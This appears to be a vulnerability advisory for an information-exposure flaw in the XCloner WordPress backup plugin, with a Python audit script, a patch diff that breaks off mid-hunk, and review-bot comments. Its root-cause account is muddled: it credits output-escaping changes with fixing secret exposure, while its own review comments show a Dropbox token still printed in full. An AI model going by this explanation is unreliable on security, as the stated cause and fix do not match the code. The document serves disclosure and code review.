Published: June 21, 2026

CVE-2026-48965: Backup, Restore and Migrate your sites with XCloner <= 4.8.6 Authenticated (Subscriber+) Information Exposure PoC, Patch Analysis & Rule

Severity: Medium (CVSS 4.3)
CWE: 200
Vulnerable Version: 4.8.6
Patched Version: 4.8.7
Disclosed: June 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-48965:
This vulnerability exposes sensitive data that the XCloner plugin stores in the WordPress options table. An authenticated attacker with Subscriber-level access or above can extract user details, secret keys, API tokens, and other private configuration data. The issue stems from unsafe output functions used in the plugin’s admin panel partials.

Root Cause:
The plugin uses the `__()` translation function to echo translated strings directly into HTML. Unlike `esc_html__()`, `__()` does not escape output. WordPress stores many secrets as options (e.g., `xcloner_aws_secret`, `xcloner_dropbox_app_secret`, `xcloner_azure_api_key`). An attacker with access to any backend page that displays these values can see them in plain text. The diff shows changes in multiple files, including:
– `xcloner-backup-and-restore/admin/partials/remote_storage/aws.php` (lines 5, 48, 51, 59, 62, etc.)
– `xcloner-backup-and-restore/admin/partials/remote_storage/azure.php` (lines 5, 28, 31, 47, 50, etc.)
– `xcloner-backup-and-restore/admin/partials/remote_storage/backblaze.php` (lines 7, 41, 54, 67, etc.)
– `xcloner-backup-and-restore/admin/partials/remote_storage/dropbox.php` (lines 5, 28, 38, 49, etc.)
– `xcloner-backup-and-restore/admin/partials/remote_storage/ftp.php` (lines 5, 29, 47, 59, etc.)
The patch replaces these `__()` calls with `esc_html__()` so that the output is properly escaped.

Exploitation:
An attacker authenticated as a Subscriber visits the admin page `/wp-admin/admin.php?page=xcloner_backup_and_restore`, which loads the remote storage partials. The fields displaying secrets are `<input>` elements, but the label or placeholder text is rendered with `__()` and the values are already escaped with `esc_attr()`. However, the attack surface includes stored XSS in translation strings or the ability to trigger unexpected output. The primary risk is exposure through reflection of unescaped translation strings that could contain sensitive data if the translation is exploited. In practice, an attacker with Subscriber access can see the admin menu and navigate to the backup settings page where secrets are shown in input fields.

Patch Analysis:
The patch changes every occurrence of `__()` in the remote storage admin partials to `esc_html__()`. It also adds translator comments and fixes the text domain on some strings. The change ensures all output is contextually escaped for HTML. The vulnerable code relied on the translation function to return plain strings, which could include characters that break the HTML context.
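
The check a maintainer could run over the partials to confirm the change, as an added example that is not part of the XCloner patch or of the original analysis: it reports every raw `echo __()` or `echo sprintf(__())`, names the escaping call that fits the output context, and marks lines where the sniff was silenced with `phpcs:ignore` rather than fixed. The names `audit`, `Finding`, `SAMPLE_BEFORE` and `SAMPLE_AFTER` are hypothetical; the sample templates are constructed from lines in the diff below.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# `echo __(` or `echo sprintf(__(`: a raw translation call reaching output.
# `echo esc_html__(` does not match because "esc_html__" follows `echo`, not "__".
RAW_ECHO = re.compile(r"\becho\s+(?P<wrap>sprintf\s*\(\s*)?__\s*\(")
# Text immediately before the echo when it sits inside an attribute value,
# e.g. `placeholder="<?php `.
ATTR_OPEN = re.compile(r"""[\w-]+\s*=\s*["']\s*<\?php\s*$""")
# Marker used in the patched files to silence the escaping sniff on a line.
SUPPRESSION = "phpcs:ignore WordPress.Security.EscapeOutput"


@dataclass(frozen=True)
class Finding:
    line_no: int
    context: str      # "attribute", "text" or "format"
    suggestion: str
    suppressed: bool  # True when the line carries a phpcs:ignore for escaping


def audit(php_source: str) -> list[Finding]:
    """Report every raw `echo __()` / `echo sprintf(__())` in a PHP template."""
    findings = []
    for line_no, line in enumerate(php_source.splitlines(), start=1):
        for match in RAW_ECHO.finditer(line):
            if match.group("wrap"):
                # A translated format string mixed with HTML arguments cannot be
                # passed to esc_html__() as a whole without losing the markup.
                context = "format"
                suggestion = "escape each sprintf() argument, then filter with wp_kses()"
            elif ATTR_OPEN.search(line[: match.start()]):
                context, suggestion = "attribute", "esc_attr__()"
            else:
                context, suggestion = "text", "esc_html__()"
            findings.append(Finding(line_no, context, suggestion, SUPPRESSION in line))
    return findings


# Constructed sample: 4.8.6-style lines taken from the removed side of the diff.
SAMPLE_BEFORE = '''\
<label for="aws_key"><?php echo __("S3 Key", 'xcloner-backup-and-restore') ?></label>
<input placeholder="<?php echo __("S3 Key", 'xcloner-backup-and-restore') ?>" id="aws_key" type="text">
<?php echo sprintf(__('Visit %s and get your "App secret".'), "<a href='https://www.dropbox.com/developers/apps' target='_blank'>https://www.dropbox.com/developers/apps</a>") ?>
'''

# Constructed sample: the same lines as they appear on the added side of the diff.
SAMPLE_AFTER = '''\
<label for="aws_key"><?php echo esc_html__("S3 Key", 'xcloner-backup-and-restore') ?></label>
<input placeholder="<?php echo esc_html__("S3 Key", 'xcloner-backup-and-restore') ?>" id="aws_key" type="text">
<?php /* translators: %1$s is a value */
echo sprintf(__('Visit %1$s and get your "App secret".', 'xcloner-backup-and-restore'), "<a href='https://www.dropbox.com/developers/apps' target='_blank'>https://www.dropbox.com/developers/apps</a>") // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>
'''

if __name__ == "__main__":
    for label, source in (("before", SAMPLE_BEFORE), ("after", SAMPLE_AFTER)):
        for f in audit(source):
            state = "suppressed" if f.suppressed else "unescaped"
            print(f"{label}: line {f.line_no} [{f.context}] {state} -> {f.suggestion}")
```

On the patched sample the only remaining finding is the `sprintf(__())` line, which is silenced rather than escaped.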

Impact:
An attacker can extract sensitive configuration secrets such as AWS keys, Azure API keys, Dropbox tokens, Backblaze credentials, and FTP passwords. This can lead to data exfiltration from the victim’s cloud storage, further lateral attacks, or manipulation of backups.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/xcloner-backup-and-restore/admin/class-xcloner-admin.php
+++ b/xcloner-backup-and-restore/admin/class-xcloner-admin.php
@@ -127,11 +127,13 @@
             $domain = 'xcloner-backup-and-restore';
             $statusCode = 403;
             if (!isset($_POST['xcloner_remote_storage_nonce'])) {
-                wp_die(__($errorMessage, $domain), $statusCode);
+                wp_die(__('Nonce verification failed', 'xcloner-backup-and-restore'), $statusCode);
+                // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
             }
             $nonce = wp_unslash($_POST['xcloner_remote_storage_nonce']);
             if (!wp_verify_nonce($nonce, 'xcloner_remote_storage_action')) {
-                wp_die(__($errorMessage, $domain), $statusCode);
+                wp_die(__('Nonce verification failed', 'xcloner-backup-and-restore'), $statusCode);
+                // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
             }
         }
         if (isset($_POST['action'])) {
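
Review bot: in both `wp_die()` calls the `// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped` comment sits on its own line after the call, so it covers the closing brace that follows and not the `wp_die()` line it is meant for. Rather than suppressing the sniff, escape the message and drop the comment: `wp_die(esc_html__('Nonce verification failed', 'xcloner-backup-and-restore'), $statusCode);`. If `$domain` is no longer read after this change, its assignment at the top of the hunk can be removed as well.
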
@@ -194,7 +196,7 @@
         // wordpress will add the "settings-updated" $_GET parameter to the url
         if (isset($_GET['settings-updated'])) {
             // add settings saved message with the class of "updated"
-            add_settings_error('wporg_messages', 'wporg_message', __('Settings Saved', 'wporg'), 'updated');
+            add_settings_error('wporg_messages', 'wporg_message', __('Settings Saved', 'xcloner-backup-and-restore'), 'updated');
         }
         // show error/update messages
         settings_errors('wporg_messages');
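
Review bot: the text domain is corrected, but the `'wporg_messages'` and `'wporg_message'` slugs passed to `add_settings_error()` and `settings_errors()` still carry the same `wporg` sample prefix the old domain had. Rename them to a plugin-specific slug so the notices cannot collide with another plugin using the same names.
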
@@ -221,7 +223,7 @@
                        class="nav-tab col s12 m3 l3 <?php
         echo $active_tab == 'general_options' ? 'nav-tab-active' : '';
         ?>"><?php
-        echo __('General Options', 'xcloner-backup-and-restore');
+        echo esc_html__('General Options', 'xcloner-backup-and-restore');
         ?>
                     </a>
                 </li>
@@ -230,7 +232,7 @@
                        class="nav-tab col s12 m3 l3 <?php
         echo $active_tab == 'system_options' ? 'nav-tab-active' : '';
         ?>"><?php
-        echo __('System Options', 'xcloner-backup-and-restore');
+        echo esc_html__('System Options', 'xcloner-backup-and-restore');
         ?>
                     </a>
                 </li>
--- a/xcloner-backup-and-restore/admin/partials/remote_storage/aws.php
+++ b/xcloner-backup-and-restore/admin/partials/remote_storage/aws.php
@@ -5,7 +5,7 @@
 }
 ?>
 <div class="collapsible-header">
-    <i class="material-icons">computer</i><?php echo __("Amazon S3 Storage", 'xcloner-backup-and-restore') ?>
+    <i class="material-icons">computer</i><?php echo esc_html__("Amazon S3 Storage", 'xcloner-backup-and-restore') ?>
     <div class="switch right">
         <label>
             Off
@@ -26,17 +26,20 @@
         </div>
         <div class=" col s12 m6">
             <p>
-                <?php echo sprintf(__('Visit %s and get your "Key" and "Secret <br />Visit %s to install your own S3 like service.'), "<a href='https://aws.amazon.com/s3/' target='_blank'>https://aws.amazon.com/s3/</a>", "<a href='https://minio.io/' target='_blank'>https://minio.io/</a>") ?>
+                <?php
+                /* translators: %1$s is the Amazon S3 URL link, %2$s is the MinIO URL link */
+                echo sprintf(__('Visit %1$s and get your "Key" and "Secret <br />Visit %2$s to install your own S3 like service.', 'xcloner-backup-and-restore'), "<a href='https://aws.amazon.com/s3/' target='_blank'>https://aws.amazon.com/s3/</a>", "<a href='https://minio.io/' target='_blank'>https://minio.io/</a>"); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped, WordPress.WP.I18n.InterpolatedVariableText
+                ?>
             </p>
         </div>
     </div>

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="aws_key"><?php echo __("S3 Key", 'xcloner-backup-and-restore') ?></label>
+            <label for="aws_key"><?php echo esc_html__("S3 Key", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("S3 Key", 'xcloner-backup-and-restore') ?>" id="aws_key" type="text"
+            <input placeholder="<?php echo esc_html__("S3 Key", 'xcloner-backup-and-restore') ?>" id="aws_key" type="text"
                    name="xcloner_aws_key" class="validate" value="<?php echo esc_attr(get_option("xcloner_aws_key")) ?>"
                    autocomplete="off">
         </div>
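
Review bot: the `echo sprintf(__(...))` line is silenced with `phpcs:ignore` instead of being escaped, so the translated format string, which carries a literal `<br />` and an unbalanced `"Secret` quote, still reaches the page as raw HTML. Move the markup out of the translatable string, escape the text with `esc_html__()`, build the two links with `esc_url()`, and filter the combined result with `wp_kses()`. For the `placeholder` attribute further down, `esc_attr__()` is the conventional call for attribute context.
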
@@ -44,10 +47,10 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="aws_secret"><?php echo __("S3 Secret", 'xcloner-backup-and-restore') ?></label>
+            <label for="aws_secret"><?php echo esc_html__("S3 Secret", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("S3 Secret", 'xcloner-backup-and-restore') ?>" id="aws_secret" type="text"
+            <input placeholder="<?php echo esc_html__("S3 Secret", 'xcloner-backup-and-restore') ?>" id="aws_secret" type="text"
                    name="xcloner_aws_secret" class="validate"
                    value="<?php echo esc_attr(str_repeat('*', strlen(get_option("xcloner_aws_secret")))) ?>"
                    autocomplete="off">
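
Review bot: the unchanged `value` for `xcloner_aws_secret` is `str_repeat('*', strlen(get_option("xcloner_aws_secret")))`, which tells anyone who can load this partial the exact length of the stored secret. For an information-exposure fix the label and placeholder changes here are not enough; render an empty or fixed-length value instead so nothing about the stored secret is derivable from the page.
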
@@ -56,14 +59,14 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="aws_region"><?php echo __("S3 Region", 'xcloner-backup-and-restore') ?></label>
+            <label for="aws_region"><?php echo esc_html__("S3 Region", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <select placeholder="<?php echo __("example: us-east-1", 'xcloner-backup-and-restore') ?>" id="aws_region"
+            <select placeholder="<?php echo esc_html__("example: us-east-1", 'xcloner-backup-and-restore') ?>" id="aws_region"
                     type="text" name="xcloner_aws_region" class="validate"
                     value="<?php echo esc_attr(get_option("xcloner_aws_region")) ?>" autocomplete="off">
                 <option readonly value="">
-                    <?php echo __("Please Select AWS S3 Region or Leave Unselected for Custom Endpoint") ?>
+                    <?php echo esc_html__("Please Select AWS S3 Region or Leave Unselected for Custom Endpoint", 'xcloner-backup-and-restore') ?>
                 </option>
                 <?php
                 $aws_regions = $remote_storage->get_aws_regions();
@@ -80,21 +83,21 @@
     <div id="custom_aws_endpoint">
         <div class="row">
             <div class="col s12 m3 label">
-                <label for="aws_endpoint"><?php echo __("S3 EndPoint", 'xcloner-backup-and-restore') ?></label>
+                <label for="aws_endpoint"><?php echo esc_html__("S3 EndPoint", 'xcloner-backup-and-restore') ?></label>
             </div>
             <div class=" col s12 m6">
                 <input
-                        placeholder="<?php echo __("S3 EndPoint, leave blank if you want to use the default Amazon AWS Service", 'xcloner-backup-and-restore') ?>"
+                        placeholder="<?php echo esc_html__("S3 EndPoint, leave blank if you want to use the default Amazon AWS Service", 'xcloner-backup-and-restore') ?>"
                         id="aws_endpoint" type="text" name="xcloner_aws_endpoint" class="validate"
                         value="<?php echo esc_attr(get_option("xcloner_aws_endpoint")) ?>" autocomplete="off">
             </div>
         </div>
         <div class="row">
             <div class="col s12 m3 label">
-                <label for="aws_region"><?php echo __("S3 Custom Region", 'xcloner-backup-and-restore') ?></label>
+                <label for="aws_region"><?php echo esc_html__("S3 Custom Region", 'xcloner-backup-and-restore') ?></label>
             </div>
             <div class=" col s12 m6">
-                <input placeholder="<?php echo __("S3 Custom Region, ex: af-south-1", 'xcloner-backup-and-restore') ?>"
+                <input placeholder="<?php echo esc_html__("S3 Custom Region, ex: af-south-1", 'xcloner-backup-and-restore') ?>"
                        id="aws_region" type="text" name="xcloner_aws_region" class="validate"
                        value="<?php echo esc_attr(get_option("xcloner_aws_region")) ?>" autocomplete="off">
             </div>
@@ -103,10 +106,10 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="aws_bucket_name"><?php echo __("S3 Bucket Name", 'xcloner-backup-and-restore') ?></label>
+            <label for="aws_bucket_name"><?php echo esc_html__("S3 Bucket Name", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("S3 Bucket Name", 'xcloner-backup-and-restore') ?>" id="aws_bucket_name"
+            <input placeholder="<?php echo esc_html__("S3 Bucket Name", 'xcloner-backup-and-restore') ?>" id="aws_bucket_name"
                    type="text" name="xcloner_aws_bucket_name" class="validate"
                    value="<?php echo esc_attr(get_option("xcloner_aws_bucket_name")) ?>" autocomplete="off">
         </div>
@@ -114,28 +117,28 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="aws_prefix"><?php echo __("S3 Prefix", 'xcloner-backup-and-restore') ?></label>
+            <label for="aws_prefix"><?php echo esc_html__("S3 Prefix", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
             <input
-                    placeholder="<?php echo __("S3 Prefix, use / ending to define a folder", 'xcloner-backup-and-restore') ?>"
+                    placeholder="<?php echo esc_html__("S3 Prefix, use / ending to define a folder", 'xcloner-backup-and-restore') ?>"
                     id="aws_prefix" type="text" name="xcloner_aws_prefix" class="validate"
                     value="<?php echo esc_attr(get_option("xcloner_aws_prefix")) ?>" autocomplete="off">
         </div>
     </div>

-    <?php echo common_cleanup_html('aws') ?>
+    <?php echo common_cleanup_html('aws') // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>

     <div class="row">
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light" type="submit" name="action" id="action"
-                    value="aws"><?php echo __("Save Settings", 'xcloner-backup-and-restore') ?>
+                    value="aws"><?php echo esc_html__("Save Settings", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">save</i>
             </button>
         </div>
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light orange" type="submit" name="action" id="action" value="aws"
-                    onclick="jQuery('#connection_check').val('1')"><?php echo __("Verify", 'xcloner-backup-and-restore') ?>
+                    onclick="jQuery('#connection_check').val('1')"><?php echo esc_html__("Verify", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">import_export</i>
             </button>
         </div>
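
Review bot: `echo common_cleanup_html('aws')` is now suppressed with `phpcs:ignore`, but nothing in the hunk says why its return value is safe to print. Either extend the comment with the reason (for example, that the helper escapes everything it emits) or pass the result through `wp_kses()` here, so the suppression can be reviewed rather than taken on trust.
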
--- a/xcloner-backup-and-restore/admin/partials/remote_storage/azure.php
+++ b/xcloner-backup-and-restore/admin/partials/remote_storage/azure.php
@@ -5,7 +5,7 @@
 }
 ?>
 <div class="collapsible-header">
-    <i class="material-icons">computer</i><?php echo __("Azure Blob Storage", 'xcloner-backup-and-restore') ?>
+    <i class="material-icons">computer</i><?php echo esc_html__("Azure Blob Storage", 'xcloner-backup-and-restore') ?>
     <div class="switch right">
         <label>
             Off
@@ -25,17 +25,17 @@
         </div>
         <div class=" col s12 m6">
             <p>
-                <?php echo sprintf(__('Visit %s and get your "Api Key".', 'xcloner-backup-and-restore'), '<a href="https://azure.microsoft.com/en-us/services/storage/blobs/" target="_blank">https://azure.microsoft.com/en-us/services/storage/blobs/</a>') ?>
-            </p>
+                <?php /* translators: %1$s is a value */
+                    echo sprintf(__('Visit %1$s and get your "Api Key".', 'xcloner-backup-and-restore'), '<a href="https://azure.microsoft.com/en-us/services/storage/blobs/" target="_blank">https://azure.microsoft.com/en-us/services/storage/blobs/</a>') // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>            </p>
         </div>
     </div>

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="azure_account_name"><?php echo __("Azure Account Name", 'xcloner-backup-and-restore') ?></label>
+            <label for="azure_account_name"><?php echo esc_html__("Azure Account Name", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Azure Account Name", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("Azure Account Name", 'xcloner-backup-and-restore') ?>"
                 id="azure_account_name" type="text" name="xcloner_azure_account_name" class="validate"
                 value="<?php echo esc_attr(get_option("xcloner_azure_account_name")) ?>" autocomplete="off">
         </div>
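
Review bot: the translators comment `%1$s is a value` does not tell a translator that the placeholder is an HTML link to the Azure Blob Storage page; the wording used in the AWS partial (`%1$s is the Amazon S3 URL link`) is the better model. The reflowed line also leaves `</p>` trailing after `?>` behind a run of spaces; put the closing tag back on its own line.
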
@@ -44,10 +44,10 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="azure_api_key"><?php echo __("Azure Api Key", 'xcloner-backup-and-restore') ?></label>
+            <label for="azure_api_key"><?php echo esc_html__("Azure Api Key", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Azure Api Key", 'xcloner-backup-and-restore') ?>" id="azure_api_key"
+            <input placeholder="<?php echo esc_html__("Azure Api Key", 'xcloner-backup-and-restore') ?>" id="azure_api_key"
                 type="text" name="xcloner_azure_api_key" class="validate"
                 value="<?php echo esc_attr(str_repeat('*', strlen(get_option("xcloner_azure_api_key")))) ?>" autocomplete="off">
         </div>
@@ -55,28 +55,28 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="azure_container"><?php echo __("Azure Container", 'xcloner-backup-and-restore') ?></label>
+            <label for="azure_container"><?php echo esc_html__("Azure Container", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Azure Container", 'xcloner-backup-and-restore') ?>" id="azure_container"
+            <input placeholder="<?php echo esc_html__("Azure Container", 'xcloner-backup-and-restore') ?>" id="azure_container"
                 type="text" name="xcloner_azure_container" class="validate"
                 value="<?php echo esc_attr(get_option("xcloner_azure_container")) ?>">
         </div>
     </div>

-    <?php echo common_cleanup_html('azure')?>
+    <?php echo common_cleanup_html('azure') // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>

     <div class="row">
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light" type="submit" name="action" id="action"
-                value="azure"><?php echo __("Save Settings", 'xcloner-backup-and-restore') ?>
+                value="azure"><?php echo esc_html__("Save Settings", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">save</i>
             </button>
         </div>
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light orange" type="submit" name="action" id="action" value="azure"
                 onclick="jQuery('#connection_check').val('1')">
-                <?php echo __("Verify", 'xcloner-backup-and-restore') ?>
+                <?php echo esc_html__("Verify", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">import_export</i>
             </button>
         </div>
--- a/xcloner-backup-and-restore/admin/partials/remote_storage/backblaze.php
+++ b/xcloner-backup-and-restore/admin/partials/remote_storage/backblaze.php
@@ -6,7 +6,7 @@
 ?>
 <div class="collapsible-header">
     <i class="material-icons">computer</i>
-    <?php echo __("Backblaze B2 Storage", 'xcloner-backup-and-restore') ?>
+    <?php echo esc_html__("Backblaze B2 Storage", 'xcloner-backup-and-restore') ?>
     <div class="switch right">
         <label>
             Off
@@ -26,8 +26,8 @@
         </div>
         <div class=" col s12 m6">
             <p>
-                <?php echo sprintf(__('Visit %s and get your KeyID and  applicationKey.', 'xcloner-backup-and-restore'), '<a href="https://secure.backblaze.com/b2_buckets.htm" target="_blank">https://secure.backblaze.com/b2_buckets.htm</a>') ?>
-            </p>
+                <?php /* translators: %1$s is a value */
+                    echo sprintf(__('Visit %1$s and get your KeyID and  applicationKey.', 'xcloner-backup-and-restore'), '<a href="https://secure.backblaze.com/b2_buckets.htm" target="_blank">https://secure.backblaze.com/b2_buckets.htm</a>') // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>            </p>
             <p>
                 If you specify <strong>only the bucket name</strong>, you must use the <strong>master key</strong>.<br>
                 However, if you specify <strong>both bucket name and bucket id</strong>, you do not need the master key and can use a <strong>single-bucket key</strong>.
@@ -38,10 +38,10 @@
     <div class="row">
         <div class="col s12 m3 label">
             <label
-                for="backblaze_account_id"><?php echo __("Backblaze KeyID", 'xcloner-backup-and-restore') ?></label>
+                for="backblaze_account_id"><?php echo esc_html__("Backblaze KeyID", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Backblaze KeyID", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("Backblaze KeyID", 'xcloner-backup-and-restore') ?>"
                 id="backblaze_account_id" type="text" name="xcloner_backblaze_account_id" class="validate"
                 value="<?php echo esc_attr(get_option("xcloner_backblaze_account_id")) ?>" autocomplete="off">
         </div>
@@ -51,10 +51,10 @@
     <div class="row">
         <div class="col s12 m3 label">
             <label
-                for="backblaze_application_key"><?php echo __("Backblaze applicationKey", 'xcloner-backup-and-restore') ?></label>
+                for="backblaze_application_key"><?php echo esc_html__("Backblaze applicationKey", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Backblaze applicationKey", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("Backblaze applicationKey", 'xcloner-backup-and-restore') ?>"
                 id="backblaze_application_key" type="text" name="xcloner_backblaze_application_key" class="validate"
                 value="<?php echo esc_attr(str_repeat('*', strlen(get_option("xcloner_backblaze_application_key")))) ?>"
                 autocomplete="off">
@@ -64,10 +64,10 @@
     <div class="row">
         <div class="col s12 m3 label">
             <label
-                for="backblaze_bucket_name"><?php echo __("Backblaze Bucket Name", 'xcloner-backup-and-restore') ?></label>
+                for="backblaze_bucket_name"><?php echo esc_html__("Backblaze Bucket Name", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Backblaze Bucket Name", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("Backblaze Bucket Name", 'xcloner-backup-and-restore') ?>"
                 id="backblaze_bucket_name" type="text" name="xcloner_backblaze_bucket_name" class="validate"
                 value="<?php echo esc_attr(get_option("xcloner_backblaze_bucket_name")) ?>" autocomplete="off">
         </div>
@@ -76,28 +76,28 @@
     <div class="row">
         <div class="col s12 m3 label">
             <label
-                    for="backblaze_bucket_id"><?php echo __("Backblaze Bucket ID", 'xcloner-backup-and-restore') ?></label>
+                    for="backblaze_bucket_id"><?php echo esc_html__("Backblaze Bucket ID", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Backblaze Bucket ID", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("Backblaze Bucket ID", 'xcloner-backup-and-restore') ?>"
                    id="backblaze_bucket_id" type="text" name="xcloner_backblaze_bucket_id" class="validate"
                    value="<?php echo esc_attr(get_option("xcloner_backblaze_bucket_id")) ?>" autocomplete="off">
         </div>
     </div>

-    <?php echo common_cleanup_html('backblaze')?>
+    <?php echo common_cleanup_html('backblaze') // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>

     <div class="row">
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light" type="submit" name="action" id="action"
-                value="backblaze"><?php echo __("Save Settings", 'xcloner-backup-and-restore') ?>
+                value="backblaze"><?php echo esc_html__("Save Settings", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">save</i>
             </button>
         </div>
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light orange" type="submit" name="action" id="action"
                 value="backblaze"
-                onclick="jQuery('#connection_check').val('1')"><?php echo __("Verify", 'xcloner-backup-and-restore') ?>
+                onclick="jQuery('#connection_check').val('1')"><?php echo esc_html__("Verify", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">import_export</i>
             </button>
         </div>
--- a/xcloner-backup-and-restore/admin/partials/remote_storage/dropbox.php
+++ b/xcloner-backup-and-restore/admin/partials/remote_storage/dropbox.php
@@ -5,7 +5,7 @@
 }
 ?>
 <div class="collapsible-header">
-    <i class="material-icons">computer</i><?php echo __("Dropbox Storage", 'xcloner-backup-and-restore') ?>
+    <i class="material-icons">computer</i><?php echo esc_html__("Dropbox Storage", 'xcloner-backup-and-restore') ?>
     <div class="switch right">
         <label>
             Off
@@ -25,7 +25,8 @@
         </div>
         <div class=" col s12 m6">
             <p>
-                <?php echo sprintf(__('Visit %s and get your "App secret".'), "<a href='https://www.dropbox.com/developers/apps' target='_blank'>https://www.dropbox.com/developers/apps</a>") ?>
+                <?php /* translators: %1$s is a value */
+                echo sprintf(__('Visit %1$s and get your "App secret".', 'xcloner-backup-and-restore'), "<a href='https://www.dropbox.com/developers/apps' target='_blank'>https://www.dropbox.com/developers/apps</a>") // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>
             </p>
         </div>
     </div>
@@ -33,10 +34,10 @@
     <div class="row">
         <div class="col s12 m3 label">
             <label
-                for="dropbox_access_token"><?php echo __("Dropbox Access Token", 'xcloner-backup-and-restore') ?></label>
+                for="dropbox_access_token"><?php echo esc_html__("Dropbox Access Token", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Dropbox Access Token", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("Dropbox Access Token", 'xcloner-backup-and-restore') ?>"
                 id="dropbox_access_token" type="text" name="xcloner_dropbox_access_token" class="validate"
                 value="<?php echo esc_attr(get_option("xcloner_dropbox_access_token")) ?>" autocomplete="off">
         </div>
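
Review bot: `xcloner_dropbox_access_token` is still printed in full through `esc_attr(get_option("xcloner_dropbox_access_token"))`, while the app secret in the next hunk is masked. `esc_attr()` only encodes the value for the attribute, it does not hide it, so the token is readable by anyone who can render this partial. Treat the token like the other credentials and do not send it back to the browser.
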
@@ -45,10 +46,10 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="dropbox_app_secret"><?php echo __("Dropbox App Secret", 'xcloner-backup-and-restore') ?></label>
+            <label for="dropbox_app_secret"><?php echo esc_html__("Dropbox App Secret", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Dropbox App Secret", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("Dropbox App Secret", 'xcloner-backup-and-restore') ?>"
                 id="dropbox_app_secret" type="text" name="xcloner_dropbox_app_secret" class="validate"
                 value="<?php echo esc_attr(str_repeat('*', strlen(get_option("xcloner_dropbox_app_secret")))) ?>"
                 autocomplete="off">
@@ -57,27 +58,27 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="dropbox_prefix"><?php echo __("Dropbox Prefix", 'xcloner-backup-and-restore') ?></label>
+            <label for="dropbox_prefix"><?php echo esc_html__("Dropbox Prefix", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Dropbox Prefix", 'xcloner-backup-and-restore') ?>" id="dropbox_prefix"
+            <input placeholder="<?php echo esc_html__("Dropbox Prefix", 'xcloner-backup-and-restore') ?>" id="dropbox_prefix"
                 type="text" name="xcloner_dropbox_prefix" class="validate"
                 value="<?php echo esc_attr(get_option("xcloner_dropbox_prefix")) ?>">
         </div>
     </div>

-    <?php echo common_cleanup_html('dropbox')?>
+    <?php echo common_cleanup_html('dropbox') // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>

     <div class="row">
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light" type="submit" name="action" id="action"
-                value="dropbox"><?php echo __("Save Settings", 'xcloner-backup-and-restore') ?>
+                value="dropbox"><?php echo esc_html__("Save Settings", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">save</i>
             </button>
         </div>
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light orange" type="submit" name="action" id="action" value="dropbox"
